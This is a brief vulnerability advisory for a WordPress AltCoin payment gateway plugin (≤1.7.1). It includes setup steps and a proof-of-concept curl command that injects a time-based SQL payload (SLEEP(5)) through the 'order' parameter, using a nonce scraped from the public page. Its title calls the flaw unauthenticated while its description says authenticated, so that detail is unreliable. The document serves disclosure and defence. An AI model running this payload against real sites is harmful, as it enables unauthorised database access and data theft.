Bitcoin / AltCoin Payment Gateway <= 1.7.1 - Unauthenticated SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by authenticated users

PoC

Setup: 1. Install woocommerce (dependency, no setup required) 2. Install the vulnerable plugin (woo-altcoin-payment-gateway version 1.7.1) 3. In the AltCoin Payment settings, enable the AltCoin payment gateway (/wp-admin/admin.php?page=cs-woo-altcoin-gateway-settings) 4. Add a new coin (/wp-admin/admin.php?page=cs-woo-altcoin-add-new-coin), with the following dummy values: Payment Confirmation Type: Manual Enter Coin Name: Bitcoin Enter Coin Wallet Address: 1KPLgee6crr7u1KQxwnnu4isizufxadVPZ Active / Deactivate: checked Attack: 1. As an unauthenticated user, visit the main page of the WordPress instance to extract the nonce - CTRL+F for “cs_token” 2. Invoke the following curl command, with the just obtained nonce, to induce a 5 second sleep: time curl ‘https://example.com/wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&amp;cs;_token=&amp;order;=(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)’ \ --data ‘method=admin\options\functions\Coin_List@prepare_items’